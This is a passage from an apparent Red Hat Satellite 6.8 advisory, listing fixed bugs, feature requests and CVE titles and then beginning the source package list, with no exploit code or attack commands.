object properties are not propagated to Child objects in Location and Host Group\n1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command\n1753551 - Traces output from Satellite GUI has mismatches with client tracer output\n1756991 - 2 inputs with same name -\u003e uninitialized constant #\u003cClass:0x000000000b894c38\u003e::NonUniqueInputsError\n1757317 - [RFE] Dynflow workers extraction\n1757394 - [BUG] Non-admin users always get \"Missing one of the required permissions\" message while accessing their own table_preferences via Satellite 6 API\n1759160 - Rake task for cleaning up DHCP records on proxy\n1761872 - Disabled buttons are still working\n1763178 - [RFE] Unnecessary call to userhelp and therefore log entries\n1763816 - [RFE] Report which users access the API\n1766613 - Fact search bar broken and resets to only searching hostname\n1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting\n1767497 - Compute Resource filter does not correctly allow Refresh Cache\n1767635 - [RFE] Enable Organization and Location to be entered not just selected\n1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer. \n1770544 - Puppet run job notification do not populate \"%{puppet_options}\"\u0027 value\n1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method `[]\u0027 for nil:NilClass\n1771367 - undefined method `request_uri\u0027 when Openidc Provider Token Endpoint is none\n1771428 - Openscap documentation link on Satellite 6 webui is broke\n1771484 - Client side documentation links are not branded\n1771693 - \u0027Deployed on\u0027 parameter is not listed in API output\n1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order\n1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again\n1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt\n1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare\n1774710 - UI: When selecting the server type in ldap authentication, \"attribute mappings\" fields could be populated automatically\n1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)\n1778503 - Prepended text on OS name creation\n1778681 - Some pages are missing title in html head\n1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI. \n1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly\n1782352 - [RHEL 8.1 client] All packages are not getting updated after click on \"Update All Packages\"\n1782426 - Viewing errata from a repository returns incorrect unfiltered results\n1783568 - [RFE] - Bulk Tracer Remediation\n1783882 - Ldap refresh failed with \"Validation failed: Adding would cause a cycle!\"\n1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log\n1784341 - disable CertificateRevocationListTask job in candlepin.conf by default\n1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file\n1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6. \n1785624 - [UI] Importing templates with associate \u0027never\u0027 is not resulting as expected\n1785683 - Does not load datacenter when multiple compute resources are created for same VCenter\n1785902 - Ansible RunHostJob tasks failed with \"Failed to initialize: NoMethodError - undefined method `[]\u0027 for nil:NilClass\"\n1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date\n1787329 - change filename in initrd live CPIO archive to fdi.iso\n1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL\n1788958 - [RFE] add \"elapsed time\" column to export and hammer, make it filterable in WebUI\n1789006 - Smart proxy dynflow core listens on 0.0.0.0\n1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id\n1789434 - Template editor not always allows refreshing of the preview pane\n1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely\n1789686 - Non-admin user with enough permissions can\u0027t generate report of applicable errata\n1789815 - The \"start\" parameter should be mentioned inside \"--compute-attributes:\" in hammer_cli for Satellite 6\n1789911 - \"foreman-rake katello:publish_unpublished_repositories\" is referring to column which no longer exists in katello_repositories table. \n1789924 - [RFE] As user I want to see a \"disabled\" status for Simple Content Access (Golden Ticketed) Orgs\n1791654 - drop config_templates api endpoints and parameters\n1791656 - drop deprecated host status endpoint\n1791658 - drop reports api endpoint\n1791659 - Remove `use_puppet_default` api params\n1791663 - remove deprecated permissions api parameters\n1791665 - drop deprecated compute resource uuid parameter\n1792131 - [UI] Could not specify organization/location for users that come from keycloak\n1792135 - Not able to login again if session expired from keycloak\n1792174 - [RFE] Subscription report template\n1792304 - When generating custom report, leave output format field empty\n1792378 - [RFE] Long role names are cut off in the roles UI\n1793951 - [RFE] Display request UUID on audits page\n1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists\n1794346 - Change the label for the flashing eye icon during user impersonation\n1794641 - Sync status page\u0027s content are not being displayed properly. \n1795809 - HTML tags visible on paused task page\n1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled\n1796205 - iso upload: correctly check if upload directory exists\n1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling\n1796259 - loading subscriptions page is very slow\n1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode\n1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout\n1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server\n1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state. \n1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host\n1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input\n1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input\n1802529 - Repository sync in tasks page shows percentage in 17 decimal points\n1802631 - Importing Ansible variables yields NoMethodError: undefined method `map\u0027 for nil:NilClass (initialize_variables) [variables_importer.rb]\n1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none\n1804496 - While performing bulk actions, unable to select all tasks under Monitor --\u003e Tasks page. \n1804651 - Missing information about \"Create Capsule\" via webUI\n1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages\n1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7\n1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error\n1806842 - Disabling dynflow_enable_console from setting should hide \"Dynflow console\" in Tasks\n1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method `mtu\u0027\n1807042 - [RFE] Support additional disks for VM on Azure Compute Resource\n1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics. \n1807829 - Generated inventory file doesn\u0027t exist\n1807946 - Multiple duplicate index entries are present in foreman database\n1808843 - Satellite lists unrelated RHV storage domains using v4 API\n1810250 - Unable to delete repository - Content with ID could not be found\n1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd\n1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection\n1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic \"errata\" page instead\n1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units\n1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana\u0027s API specification\n1812904 - \u0027Hypervisors\u0027 task fails with \u0027undefined method `[]\u0027 for nil:NilClass\u0027 error\n1813005 - Prevent --tuning option to be applied in Capsule servers\n1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)\n1814095 - Applicable errata not showing up for module stream errata\n1815104 - Locked provisioning template should not be allowed to add audit comment\n1815135 - hammer does not support description for custom repositories\n1815146 - Backslash escapes when downloading a JSON-formatted report multiple times\n1815608 - Content Hosts has Access to Content View from Different Organization\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1816699 - Satellite Receptor Installer role can miss accounts under certain conditions\n1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval\n1816853 - Report generated by Red Hat Inventory Uploads is empty. \n1817215 - Admin must be able to provide all the client ids involved inside Satellite settings. \n1817224 - Loading one org\u0027s content view when switching to a different org\n1817481 - Plugin does not set page \u003ctitle\u003e\n1817728 - Default task polling is too frequent at scale\n1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com. \n1818062 - Deprecated message about katello agent being shown on content host registration page\n1818816 - Web console should open in a new tab/window\n1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1820193 - Deleted Global Http Proxy is still being used during repository sync. \n1820245 - reports in JSON format can\u0027t handle unicode characters\n1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512\n1821335 - Inventory plugin captures information for systems with any entitlement\n1821457 - [RFE] Capsules shouldn\u0027t update hosts\u0027 \"Registered through\" facts on the Satellite server in a load-balanced configuration. \n1821629 - Eager zero seems to do nothing\n1821651 - Manifest import task progress remains at 0. \n1821752 - New version of the plugin is available: 1.0.5\n1822039 - Get HTTP error when deploying the virt-who configure plugin\n1822560 - Unable to sync large openshift docker repos\n1823905 - Update distributor version to sat-6.7\n1823991 - [RFE] Add a more performant way to sort reports\n1824183 - Virtual host get counted as physical hosts on cloud.redhat.com\n1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes \"Blank\"\n1825760 - schedule inventory plugin sync failed due to \u0027organization_id\u0027 typecasting issue. \n1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy\n1825978 - Manifest refresh failed with \u0027Katello::Errors::CandlepinError Invalid credentials.\u0027 error\n1826298 - even when I cancel ReX job, remediation still shows it as running\n1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images\n1826515 - [RFE] Consume Candlepin events via STOMP\n1826625 - Improve performance of externalNodes\n1826678 - New version of the plugin is available: 2.0.6\n1826734 - Tasks uses wrong controller name for bookmarks\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories\n1827583 - Installing dhcp_isc and dhcp_remote_isc fails with \"You cannot specify the same gem twice with different version requirements.....You specified: rsec (\u003c 1) and rsec (\u003e= 0)\"\n1828257 - Receptor init file missing [Install] section, receptor service won\u0027t run after restart\n1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API\n1828549 - Manifest Certificate Exposed by Unprivileged User\n1828682 - Create compute resource shows console error \u0027Cannot read property \u0027aDataSort\u0027 of undefined\u0027\n1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default\n1828868 - Add keep alive option in Receptor node\n1829487 - Ansible verbosity level does not work\n1829766 - undefined method `tr\u0027 for nil:NilClass when trying to get a new DHCP lease from infoblox\n1830253 - Default job templates are not locked\n1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time\n1830834 - Unable to update default value of a smart class parameter (Sql query error). \n1830860 - Refactor loading regions based on subscription dynamically\n1830882 - Red Hat Satellite brand icon is missing\n1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo\n1831528 - CVE-2020-5267 rubygem-actionview: views that use the `j` or `escape_javascript` methods are susceptible to XSS attacks\n1833031 - Improve RH account ID fetching in cloud connector playbook\n1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)\n1833039 - Introduce error code to playbook_run_finished response type\n1833311 - \"Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid\" while creating scap policy with ansible deployment option. \n1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of \u0027/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud\u0027 returned 1: Error: Nothing to do\n1834377 - Disable mongo FTDC\n1834866 - Missing macro for \"registered_at\" host subscription facet\n1834898 - Login Page background got centralized and cropped\n1835189 - Missing macro for \"host_redhat_subscriptions\" in host subscription facet\n1835241 - Some applicability of the consumers are not recalculated after syncing a repository\n1835882 - While executing \"Configure Cloud Connector\" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting\n1836155 - Support follow on rails, travis and i18n work for AzureRm plugin\n1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman. \n1836774 - Some foreman services failed to start (pulp_streamer)\n1836845 - \"Generate at\" in report template should be current date\n1837951 - \"invalid Unicode Property \\p: /\\b\\perform various actions through those proxies\\b(?!-)/\" warning messages appears in dynflow-sidekiq@worker-hosts-queue\n1838160 - \u0027Registered hosts\u0027 report does not list kernel release for rhsm clients\n1838191 - Arrow position is on left rather in the middle under \"Start Time\"\n1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory\n1838917 - Repositories are not showing their available Release versions due to a low default db pool size\n1838963 - Hypervisors from Satellite, never makes their way to HBI\n1838965 - Product name link is not working on the activation keys \"Repository Sets\" tab. \n1839025 - Configure Cloud Connector relies on information which is no longer provided by the API\n1839649 - satellite-installer --reset returns a traceback\n1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds\n1839779 - undefined local variable or method `implicit_order_column\u0027 for #\u003cActiveRecord::Associations::CollectionProxy\u003e on GET request to /discovery_rules endpoint\n1839966 - New version of the plugin is available: 2.0.7\n1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out . \n1840191 - Validate parameters passed by receptor to the receptor-satellite plugin\n1840218 - ArgumentError: wrong number of arguments\n1840525 - Content host list doesn\u0027t update after the successful deletion of content host. \n1840635 - Proxy has failed to load one or more features (Realm)\n1840723 - Selected scenario is DISABLED, can not continue\n1840745 - Satellite installation failed with puppet error \" No Puppet module parser is installed\"\n1841098 - Failed to resolve package dependency while doing satellite upgrade. \n1841143 - Known hosts key removal may fail hard, preventing host from being provisioned\n1841573 - Clicking breadcrumb \"Auth Source Ldaps\" on Create LDAP Auth Source results in \"The page you were looking for doesn\u0027t exist.\"\n1841818 - icons missing on /pub download page\n1842900 - ERROR! the role \u0027satellite-receptor\u0027 was not found in ... \n1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/\n1843406 - In 6.8, Receptor installation playbook\u0027s inputs are visible again\n1843561 - Report templates duplicated\n1843846 - Host - Registered Content Hosts report: \"Safemode doesn\u0027t allow to access \u0027report_hraders\u0027 on #\u003cSafemode::ScopeObject\u003e\"\n1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8\n1843926 - satellite-change-hostname fails when running nsupdate\n1844142 - [RFE] Drop a subsription-manager fact with the satellite version\n1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP\n1845486 - [RFE] Able to select \u0027HTTP Proxy\u0027 during Compute Resource create for \u0027GCE\u0027 as similar to EC2\n1845860 - hammer org add-provisioning-template command returns Error: undefined method `[]\u0027 for nil:NilClass\n1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser\n1846254 - need to restart services after enabling leapp plugin\n1846313 - Add index on locks for resource type and task id\n1846317 - undefined method `klass\u0027 for nil:NilClass\n1846421 - build pxe default do not work when more than 1 provider\n1846593 - Satellite-installer failed with error \"Could not find a suitable provider for foreman_smartproxy\" while doing upgrade from 6.7 to 6.8\n1847019 - Empty applicability for non-modular repos\n1847063 - Slow manifest import and/or refresh\n1847407 - load_pools macro not in list of macros\n1847645 - Allow override of Katello\u0027s DISTRIBUTOR_VERSION\n1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details. \n1847840 - Libvirt note link leads to 404\n1847871 - Combined Profile Update: ArgumentError: invalid argument: nil. \n1848291 - Download kernel/initram for kexec asynchronously\n1848535 - Unable to create a pure IPv6 host\n1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)\n1848902 - ERF42-0258 [Foreman::Exception]: \u003cuuid\u003e is not valid, enter id or name\n1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory\n1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool\n1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms\n1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule\n1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names\n1849656 - ERROR! You cannot use loops on \u0027import_tasks\u0027 statements. You should use \u0027include_tasks\u0027 instead. \n1849680 - Task progress decimal precision discrepancy between UI, CLI, and API\n1849869 - Unable to recycle the dynflow executor\n1850355 - Auth Source Role Filters are not working in Satellite 6.8\n1850536 - Can\u0027t add RHEV with APIv3 through Hammer\n1850914 - Checksum type \"sha256\" is not available for all units in the repository. Make sure those units have been downloaded\n1850934 - Satellite-installer failed with error \"Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)\"\n1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates\n1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9\n1851167 - Autoattach -\u003e \"undefined\" subscription added\n1851176 - Subscriptions do not provide any repository sets\n1851952 - \"candlepin_events FAIL Not running\" and wont restart\n1852371 - Allow http proxy ports by default\n1852723 - Broken link for documentation on installation media page\n1852733 - Inventory upload documentation redirects to default location\n1852735 - New version of the plugin is available: 2.0.8\n1853076 - large capsule syncs cause slow processing of dynflow tasks/steps\n1853200 - foreman-rake-db:migrate Fails on \"No indexes found on foreman_tasks_locks with the options provided\"\n1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7\n1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh\n1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views\n1853572 - Broken documentation link for \u0027RHV\u0027 in Compute Resource\n1854138 - System purpose status should show as \u0027disabled\u0027 when Satellite is in Simple Content Access mode. \n1854397 - Compliance reports are not being uploaded to satellite. \n1854530 - PG::NotNullViolation when syncing hosts from cloud\n1855008 - Host parameters are set after the host is created. \n1855254 - Links to documentation broken in HTTP Proxies setup\n1855348 - katello_applicability accidentally set to true at install\n1855710 - \u0027Ensure RPM repository is configured and enabled\u0027 task says \u0027FIXME\u0027\n1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page. \n1856379 - Add missing VM creation tests\n1856401 - [RFE] Add module to create HTTP Proxy\n1856831 - New version of the plugin is available: 2.0.9\n1856837 - undefined method \u0027#httpboot\u0027 for NilClass::Jail (NilClass) when creating an IPv6 only host\n1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500\n1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos\n1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos\n1857377 - Capsule Upgrade Playbook fails with \"Failed to initialize: NoMethodError - undefined method `default_capsule\u0027 for Katello:Module\"\n1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError\n1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename. \n1857726 - Warnings are shown during the satellite package installation on RHEL 7.9\n1858237 - Upgraded Satellite has duplicated katello_pools indexes\n1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user\n1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite\n1858855 - Creating compute resources on IPV6 network does not fail gracefully\n1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf\n1859194 - load_hosts macro duplicated in a list of macros\n1859276 - Need to update the deprecation warning message on Statistics and Trends page. \n1859705 - Tomcat is not running on fresh Capsule installation\n1859929 - User can perform other manifest actions while the first one starts\n1860351 - \u0027Host - compare content hosts packages\u0027 report fails with error \u0027undefined method \u0027#first\u0027 for NilClass\u0027\n1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed\n1860422 - Host with remediations can\u0027t be removed\n1860430 - \u0027Host - compare content hosts packages\u0027 report: Safemode doesn\u0027t allow to access \u0027version\u0027... \n1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service\n1860519 - Browsing capsule /pub directory with https fails with forbidden don\u0027t have permission to access /pub/ error. \n1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8\n1860587 - Documentation link in Administer -\u003e About pointing to 6.6 document. \n1860835 - Installed Packages not displayed on About page\n1860957 - Unable to select an organization for sync management\n1861367 - Import Template sync never completes\n1861397 - UI dialog for Capsule Upgrade Playbook job doesn\u0027t state whitelist_options is required\n1861422 - Error encountered while handling the response, replying with an error message (\u0027plugin_config\u0027)\n1861656 - smart-proxy-openscap-send command fails to upload reports to satellite. \n1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request\n1861766 - Add ability to list traces by host with hammer\n1861807 - Cancel/Abort button should be disabled once REX job is finish\n1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer\n1861831 - satellite-change-hostname cannot change the satellite hostname after failing. \n1861890 - Recommended repos do not match Satellite version\n1861970 - Content -\u003e Product doesn\u0027t work when no organization is selected\n1862135 - updating hosts policy using bulk action fails with sql error\n1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite. \n1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6\n1865871 - Obfuscated hosts do not have domain reported\n1865872 - Templates doc - examples on onepage.html are not processed\n1865874 - Add inventory status to host\n1865876 - Make recommendations count in hosts index a link\n1865879 - Add automatic scheduler for insights sync\n1865880 - Add an explanation how to enable insights sync\n1865928 - Templates documentation help page has hard-coded Satellite setting value\n1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently\n1866029 - Templates DSL documentation: Parts of description are put in \u003cpre\u003e tag\n1866436 - host search filter does not work in job invocation page\n1866461 - Run action is missing in job templates page\n1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page\n1866700 - Hammer CLI is missing \"resolve\" (traces) option for katello-tracer\n1866710 - Wrong API endpoint path referenced for resolving host traces\n1867239 - hammer content-view version incremental-update fails with ISE\n1867287 - Error Row was updated or deleted by another transaction when deleting docker repository\n1867311 - Upgrade fails when checkpoint_segments postgres parameter configured\n1867399 - Receptor-satellite isn\u0027t able to deal with jobs where all the hosts are unknown to satellite\n1867895 - API Create vmware ComputeResource fails with \"Datacenter can\u0027t be blank\"\n1868183 - Unable to change virt-who hypervisor location. \n1868971 - Receptor installation job doesn\u0027t properly escape data it puts into receptor.conf\n1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)\u0027 messages come in upgrade and installation. \n1869812 - Tasks fail to complete under load\n1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow\n1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)\n1871434 - theme css \".container\" class rule is too generic\n1871729 - ansible-runner implementation depends on third party repository for ansible-runner package. \n1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout\n1871978 - Bug in provisioning_template Module\n1872014 - Enable web console on host error in \"Oops, we\u0027re sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console\"\n1872041 - Host search returns incorrect result\n1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result\n1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover\n1874143 - Red Hat Inventory Uploads does not use proxy\n1874160 - Changing Content View of a Content Host needs to better inform the user around client needs\n1874168 - Sync Plan fails with \u0027uninitialized constant Actions::Foreman::Exception\u0027\n1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file\n1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)\n1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow\n1874176 - Unable to search by value of certain Hostgroup parameter\n1874422 - Hits Sync uses only old proxy setting\n1874619 - Hostgroup tag is never reported in slice\n1875357 - After upgrade server response check failed for candlepin. \n1875426 - Azure VM provision fails with error `requests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`\n1875660 - Reporting Template macros host_cores is not working as expected\n1875667 - Audit page list incorrect search filter\n1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only\n1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding\n1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries\n1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-*.csv\n1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-*.csv\n1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-*.csv\n1878194 - In Capsule upgrade, \"yum update\" dump some error messages. \n1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled\n1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections\n1878850 - creating host from hg doesn\u0027t resolves the user-data template\n1879151 - Remote execution status not updating with large number of hosts\n1879448 - Add hits details to host details page\n1879451 - Stop uploading if Satellite\u0027s setting is disconnected\n1879453 - Add plugin version to report metadata\n1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP\n1880637 - [6.8] satellite-installer always runs upgrade steps\n1881066 - Safemode doesn\u0027t allow to access \u0027host_cores\u0027 on #\u003cSafemode::ScopeObject\u003e\n1881078 - Use Passenger instead of Puma as the Foreman application server\n1881988 - [RFE] IPv6 support for Satellite 6.8\n1882276 - Satellite installation fails at execution of \u0027/usr/sbin/foreman-rake -- config -k \u0027remote_execution_cockpit_url\u0027 -v \u0027/webcon/=%{host}\u0027\u0027\n1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results\n1883093 - installer-upgrade failed with error \"Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)\"\n1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error \"HTTP error (500 - Internal Server Error): Unable to register system, not all services available\"\n1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals\n1887489 - Insights rules can\u0027t be loaded on freshly installed Satellite system\n1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO\n\n6. Package List:\n\nRed Hat Satellite Capsule 6.8:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\npygobject3-3.28.3-2.el7sat.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rp